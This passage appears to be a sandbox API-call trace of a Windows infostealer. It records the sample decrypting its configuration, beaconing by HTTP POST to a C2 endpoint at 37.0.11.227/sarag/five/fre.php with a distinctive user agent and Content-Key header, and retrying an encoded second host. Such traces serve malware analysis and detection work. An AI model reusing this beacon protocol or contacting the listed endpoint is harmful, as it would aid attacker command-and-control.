Size=0x212) returned 0x6a9f58 [0198.215] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0198.215] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0198.219] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0198.219] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0198.220] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0198.220] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0198.220] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0198.221] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0198.221] GetProcessHeap () returned 0x690000 [0198.221] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0198.221] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6adbf8*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aea78*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0198.221] GetProcessHeap () returned 0x690000 [0198.221] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab370 [0198.221] socket (af=2, type=1, protocol=6) returned 0x414 [0198.221] connect (s=0x414, name=0x6aea78*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0198.249] FreeAddrInfoW (pAddrInfo=0x6adbf8*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aea78*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0198.249] GetProcessHeap () returned 0x690000 [0198.249] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0198.249] GetProcessHeap () returned 0x690000 [0198.249] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b2fb8 [0198.250] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0198.250] wvsprintfA (in: param_1=0x6b2fb8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0198.251] GetProcessHeap () returned 0x690000 [0198.251] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6b0100 [0198.251] GetProcessHeap () returned 0x690000 [0198.251] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 [0198.251] GetProcessHeap () returned 0x690000 [0198.251] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4730 [0198.251] GetProcessHeap () returned 0x690000 [0198.251] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b2fb8 [0198.252] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0198.253] wvsprintfA (in: param_1=0x6b2fb8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0198.253] GetProcessHeap () returned 0x690000 [0198.253] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6abd08 [0198.253] GetProcessHeap () returned 0x690000 [0198.253] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 [0198.254] send (s=0x414, buf=0x6abd08*, len=242, flags=0) returned 242 [0198.254] send (s=0x414, buf=0x6aba40*, len=159, flags=0) returned 159 [0198.254] GetProcessHeap () returned 0x690000 [0198.254] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0198.254] recv (in: s=0x414, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0198.331] GetProcessHeap () returned 0x690000 [0198.332] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0198.332] GetProcessHeap () returned 0x690000 [0198.332] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0198.332] GetProcessHeap () returned 0x690000 [0198.332] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b0100 | out: hHeap=0x690000) returned 1 [0198.333] GetProcessHeap () returned 0x690000 [0198.333] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0198.333] closesocket (s=0x414) returned 0 [0198.334] GetProcessHeap () returned 0x690000 [0198.334] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab370 | out: hHeap=0x690000) returned 1 [0198.334] GetProcessHeap () returned 0x690000 [0198.335] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0198.335] GetProcessHeap () returned 0x690000 [0198.335] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0198.335] GetProcessHeap () returned 0x690000 [0198.335] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0198.336] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1234) returned 0x414 [0198.337] Sleep (dwMilliseconds=0xea60) [0198.338] GetProcessHeap () returned 0x690000 [0198.339] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0198.340] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0198.341] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0198.346] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0198.347] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aedd0) returned 1 [0198.352] GetProcessHeap () returned 0x690000 [0198.352] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0198.353] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0198.353] CryptImportKey (in: hProv=0x6aedd0, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0198.354] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0198.354] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0198.355] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0198.355] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0198.355] GetProcessHeap () returned 0x690000 [0198.356] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0198.356] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0198.357] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0198.357] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0198.358] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0198.358] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0198.359] CryptReleaseContext (hProv=0x6aedd0, dwFlags=0x0) returned 1 [0198.359] GetProcessHeap () returned 0x690000 [0198.359] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6abd08 [0198.359] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0198.361] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0198.361] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0198.362] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0198.363] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0198.363] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0198.364] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0198.364] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0198.364] GetProcessHeap () returned 0x690000 [0198.364] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f48 [0198.364] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0198.364] GetProcessHeap () returned 0x690000 [0198.365] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f48 | out: hHeap=0x690000) returned 1 [0198.367] GetProcessHeap () returned 0x690000 [0198.367] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0198.367] GetProcessHeap () returned 0x690000 [0198.368] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0198.368] GetProcessHeap () returned 0x690000 [0198.368] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0198.369] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0198.369] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0198.375] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0198.375] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0198.382] GetProcessHeap () returned 0x690000 [0198.382] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0198.383] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0198.383] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0198.384] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0198.384] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0198.385] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0198.385] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0198.385] GetProcessHeap () returned 0x690000 [0198.386] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0198.387] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0198.387] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0198.388] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0198.388] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0198.389] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0198.389] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0198.390] GetProcessHeap () returned 0x690000 [0198.390] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0198.390] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0198.391] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0198.392] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0198.392] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0198.393] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0198.393] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0198.394] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0198.394] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0198.394] GetProcessHeap () returned 0x690000 [0198.394] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0198.394] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a9c80*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6ae940*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0198.394] GetProcessHeap () returned 0x690000 [0198.394] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab330 [0198.394] socket (af=2, type=1, protocol=6) returned 0x418 [0198.395] connect (s=0x418, name=0x6ae940*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0198.423] FreeAddrInfoW (pAddrInfo=0x6a9c80*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6ae940*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0198.423] GetProcessHeap () returned 0x690000 [0198.423] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aedd0 [0198.423] GetProcessHeap () returned 0x690000 [0198.423] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b2fb8 [0198.424] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0198.424] wvsprintfA (in: param_1=0x6b2fb8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0198.425] GetProcessHeap () returned 0x690000 [0198.425] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6af8c0 [0198.425] GetProcessHeap () returned 0x690000 [0198.425] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 [0198.425] GetProcessHeap () returned 0x690000 [0198.425] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4730 [0198.425] GetProcessHeap () returned 0x690000 [0198.425] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b2fb8 [0198.426] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0198.427] wvsprintfA (in: param_1=0x6b2fb8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0198.427] GetProcessHeap () returned 0x690000 [0198.427] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6abd08 [0198.427] GetProcessHeap () returned 0x690000 [0198.427] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 [0198.427] send (s=0x418, buf=0x6abd08*, len=242, flags=0) returned 242 [0198.428] send (s=0x418, buf=0x6aba40*, len=159, flags=0) returned 159 [0198.428] GetProcessHeap () returned 0x690000 [0198.428] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0198.428] recv (in: s=0x418, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0198.515] GetProcessHeap () returned 0x690000 [0198.516] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0198.517] GetProcessHeap () returned 0x690000 [0198.518] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0198.518] GetProcessHeap () returned 0x690000 [0198.518] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af8c0 | out: hHeap=0x690000) returned 1 [0198.518] GetProcessHeap () returned 0x690000 [0198.519] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aedd0 | out: hHeap=0x690000) returned 1 [0198.519] closesocket (s=0x418) returned 0 [0198.521] GetProcessHeap () returned 0x690000 [0198.521] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab330 | out: hHeap=0x690000) returned 1 [0198.521] GetProcessHeap () returned 0x690000 [0198.522] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0198.522] GetProcessHeap () returned 0x690000 [0198.522] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0198.522] GetProcessHeap () returned 0x690000 [0198.522] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0198.523] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1238) returned 0x418 [0198.526] Sleep (dwMilliseconds=0xea60) [0198.527] GetProcessHeap () returned 0x690000 [0198.527] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0198.528] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0198.528] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0198.537] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0198.537] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af078) returned 1 [0198.548] GetProcessHeap () returned 0x690000 [0198.548] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88b0 [0198.549] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0198.549] CryptImportKey (in: hProv=0x6af078, pbData=0x6a88b0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0198.551] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0198.551] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0198.552] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0198.552] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0198.552] GetProcessHeap () returned 0x690000 [0198.553] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88b0 | out: hHeap=0x690000) returned 1 [0198.557] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0198.557] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0198.558] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0198.558] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0198.559] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0198.559] CryptReleaseContext (hProv=0x6af078, dwFlags=0x0) returned 1 [0198.559] GetProcessHeap () returned 0x690000 [0198.559] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0198.560] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0198.560] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0198.561] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0198.561] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0198.562] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0198.562] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0198.563] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0198.564] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0198.564] GetProcessHeap () returned 0x690000 [0198.564] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f48 [0198.564] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0198.564] GetProcessHeap () returned 0x690000 [0198.565] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f48 | out: hHeap=0x690000) returned 1 [0198.565] GetProcessHeap () returned 0x690000 [0198.565] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0198.565] GetProcessHeap () returned 0x690000 [0198.565] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0198.565] GetProcessHeap () returned 0x690000 [0198.565] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0198.566] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0198.566] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0198.572] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0198.572] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af188) returned 1 [0198.579] GetProcessHeap () returned 0x690000 [0198.579] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a00 [0198.580] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0198.580] CryptImportKey (in: hProv=0x6af188, pbData=0x6a8a00, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0198.581] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0198.581] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0198.582] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0198.582] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0198.582] GetProcessHeap () returned 0x690000 [0198.582] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a00 | out: hHeap=0x690000) returned 1 [0198.583] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0198.584] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0198.584] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0198.585] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0198.585] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0198.586] CryptReleaseContext (hProv=0x6af188, dwFlags=0x0) returned 1 [0198.586] GetProcessHeap () returned 0x690000 [0198.586] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0198.587] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0198.587] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0198.588] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0198.588] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0198.589] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0198.589] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0198.590] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0198.590] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0198.590] GetProcessHeap () returned 0x690000 [0198.590] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0198.590] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a9d20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aea18*(sa_family=2, sin_port=0x50, 